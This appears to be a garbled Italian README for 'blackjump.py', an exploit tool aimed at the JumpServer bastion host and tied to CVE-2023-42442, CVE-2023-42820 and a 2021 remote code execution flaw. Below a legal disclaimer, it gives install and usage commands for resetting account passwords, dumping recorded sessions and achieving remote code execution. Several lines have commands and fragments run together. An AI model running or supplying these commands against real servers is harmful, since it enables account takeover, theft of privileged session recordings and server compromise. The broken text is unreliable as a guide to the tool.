
JumpServer bastion host — sfruttamento non autorizzato completo, exploit per CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Disclaimer: questo strumento è destinato esclusivamente ad attività di sicurezza aziendale legittimamente autorizzate. Quando si utilizza questo strumento per test, è necessario assicurarsi che l'attività sia conforme alle leggi e ai regolamenti locali e di aver ottenuto un'adeguata autorizzazione. Non utilizzarlo su target non autorizzati.
Se durante l'utilizzo di questo strumento si compiono azioni illegali, se ne assumerà ogni conseguenza; non ci assumiamo alcuna responsabilità legale o connessa.
JumpServer Bastion Host — Sfruttamento completo delle vulnerabilità
python3 -m pip install -r requirements.txt
--user e --emailpython3 blackjump.py reset https://vulerability

<uuid4>.tar nella directory output/ possono essere riprodotti con il lettore JumpServerpython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h